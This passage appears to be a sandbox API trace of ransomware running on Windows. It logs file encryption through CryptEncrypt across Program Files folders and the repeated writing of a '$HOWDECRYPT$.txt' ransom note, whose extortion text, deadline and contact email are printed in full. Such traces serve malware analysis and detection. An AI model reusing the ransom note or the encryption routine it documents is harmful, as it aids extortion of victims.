dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.896] GetProcessHeap () returned 0x2c0000 [0161.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.896] GetProcessHeap () returned 0x2c0000 [0161.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb27f8 | out: hHeap=0x2c0000) returned 1 [0161.896] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.921] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.921] WriteFile (in: hFile=0x178, lpBuffer=0x270e72f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e858, lpOverlapped=0x0 | out: lpBuffer=0x270e72f*, lpNumberOfBytesWritten=0x270e858*=0x127, lpOverlapped=0x0) returned 1 [0161.922] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.922] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e858, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e858*=0x2ac, lpOverlapped=0x0) returned 1 [0161.922] CloseHandle (hObject=0x178) returned 1 [0161.922] GetProcessHeap () returned 0x2c0000 [0161.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecfcd0 | out: hHeap=0x2c0000) returned 1 [0161.922] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7f8 | out: pbBuffer=0x270e7f8) returned 1 [0161.922] GetProcessHeap () returned 0x2c0000 [0161.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.922] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7f0*=0x30) returned 1 [0161.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\month.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.967] GetProcessHeap () returned 0x2c0000 [0161.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.967] GetProcessHeap () returned 0x2c0000 [0161.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecfbe0 | out: hHeap=0x2c0000) returned 1 [0161.967] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7f0 | out: pbBuffer=0x270e7f0) returned 1 [0161.968] GetProcessHeap () returned 0x2c0000 [0161.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7e8*=0x30) returned 1 [0161.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl-hot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.968] GetProcessHeap () returned 0x2c0000 [0161.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.968] GetProcessHeap () returned 0x2c0000 [0161.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c861c8 | out: hHeap=0x2c0000) returned 1 [0161.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7f0 | out: pbBuffer=0x270e7f0) returned 1 [0161.968] GetProcessHeap () returned 0x2c0000 [0161.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7e8*=0x30) returned 1 [0161.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\corner.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.025] GetProcessHeap () returned 0x2c0000 [0162.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.026] GetProcessHeap () returned 0x2c0000 [0162.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecbbe8 | out: hHeap=0x2c0000) returned 1 [0162.026] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7e8 | out: pbBuffer=0x270e7e8) returned 1 [0162.026] GetProcessHeap () returned 0x2c0000 [0162.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.026] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7e0*=0x30) returned 1 [0162.026] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.059] GetProcessHeap () returned 0x2c0000 [0162.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.059] GetProcessHeap () returned 0x2c0000 [0162.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab580 | out: hHeap=0x2c0000) returned 1 [0162.059] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7e8 | out: pbBuffer=0x270e7e8) returned 1 [0162.059] GetProcessHeap () returned 0x2c0000 [0162.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.059] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7e0*=0x30) returned 1 [0162.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.061] GetProcessHeap () returned 0x2c0000 [0162.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.061] GetProcessHeap () returned 0x2c0000 [0162.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab478 | out: hHeap=0x2c0000) returned 1 [0162.062] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7e0 | out: pbBuffer=0x270e7e0) returned 1 [0162.062] GetProcessHeap () returned 0x2c0000 [0162.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.062] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7d8*=0x30) returned 1 [0162.062] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.064] GetProcessHeap () returned 0x2c0000 [0162.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.064] GetProcessHeap () returned 0x2c0000 [0162.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecbaf0 | out: hHeap=0x2c0000) returned 1 [0162.064] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7e0 | out: pbBuffer=0x270e7e0) returned 1 [0162.064] GetProcessHeap () returned 0x2c0000 [0162.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.064] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7d8*=0x30) returned 1 [0162.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.066] GetProcessHeap () returned 0x2c0000 [0162.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.066] GetProcessHeap () returned 0x2c0000 [0162.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaeab8 | out: hHeap=0x2c0000) returned 1 [0162.067] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7d8 | out: pbBuffer=0x270e7d8) returned 1 [0162.067] GetProcessHeap () returned 0x2c0000 [0162.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.067] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7d0*=0x30) returned 1 [0162.067] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.069] GetProcessHeap () returned 0x2c0000 [0162.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.069] GetProcessHeap () returned 0x2c0000 [0162.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb9f8 | out: hHeap=0x2c0000) returned 1 [0162.069] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7d8 | out: pbBuffer=0x270e7d8) returned 1 [0162.069] GetProcessHeap () returned 0x2c0000 [0162.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.069] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7d0*=0x30) returned 1 [0162.069] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-disable.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.071] GetProcessHeap () returned 0x2c0000 [0162.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.072] GetProcessHeap () returned 0x2c0000 [0162.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae8b8 | out: hHeap=0x2c0000) returned 1 [0162.072] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7d0 | out: pbBuffer=0x270e7d0) returned 1 [0162.072] GetProcessHeap () returned 0x2c0000 [0162.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.072] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e7c8*=0x30) returned 1 [0162.072] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.075] GetProcessHeap () returned 0x2c0000 [0162.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.075] GetProcessHeap () returned 0x2c0000 [0162.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb808 | out: hHeap=0x2c0000) returned 1 [0162.076] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.257] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.257] WriteFile (in: hFile=0x178, lpBuffer=0x270e703*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e82c, lpOverlapped=0x0 | out: lpBuffer=0x270e703*, lpNumberOfBytesWritten=0x270e82c*=0x127, lpOverlapped=0x0) returned 1 [0162.258] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.258] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e82c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e82c*=0x2ac, lpOverlapped=0x0) returned 1 [0162.258] CloseHandle (hObject=0x178) returned 1 [0162.258] GetProcessHeap () returned 0x2c0000 [0162.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab370 | out: hHeap=0x2c0000) returned 1 [0162.259] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7c8 | out: pbBuffer=0x270e7c8) returned 1 [0162.259] GetProcessHeap () returned 0x2c0000 [0162.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.259] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e7c0*=0x30) returned 1 [0162.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoacq.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.259] GetProcessHeap () returned 0x2c0000 [0162.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.259] GetProcessHeap () returned 0x2c0000 [0162.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84678 | out: hHeap=0x2c0000) returned 1 [0162.260] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7c8 | out: pbBuffer=0x270e7c8) returned 1 [0162.260] GetProcessHeap () returned 0x2c0000 [0162.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.260] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e7c0*=0x30) returned 1 [0162.260] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.260] GetProcessHeap () returned 0x2c0000 [0162.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.260] GetProcessHeap () returned 0x2c0000 [0162.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07778 | out: hHeap=0x2c0000) returned 1 [0162.260] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e7c0 | out: pbBuffer=0x270e7c0) returned 1 [0162.260] GetProcessHeap () returned 0x2c0000 [0162.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.260] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e7b8*=0x30) returned 1 [0162.260] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingdevices.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.261] GetProcessHeap () returned 0x2c0000 [0162.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.261] GetProcessHeap () returned 0x2c0000 [0162.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e076a8 | out: hHeap=0x2c0000) returned 1 [0162.261] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.265] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.265] WriteFile (in: hFile=0x178, lpBuffer=0x270e6f3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e81c, lpOverlapped=0x0 | out: lpBuffer=0x270e6f3*, lpNumberOfBytesWritten=0x270e81c*=0x127, lpOverlapped=0x0) returned 1 [0162.266] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.266] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e81c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e81c*=0x2ac, lpOverlapped=0x0) returned 1 [0162.266] CloseHandle (hObject=0x178) returned 1 [0162.266] GetProcessHeap () returned 0x2c0000 [0162.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7ee70 | out: hHeap=0x2c0000) returned 1 [0162.266] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.277] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.277] WriteFile (in: hFile=0x178, lpBuffer=0x270e6ef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e818, lpOverlapped=0x0 | out: lpBuffer=0x270e6ef*, lpNumberOfBytesWritten=0x270e818*=0x127, lpOverlapped=0x0) returned 1 [0162.277] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.278] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, 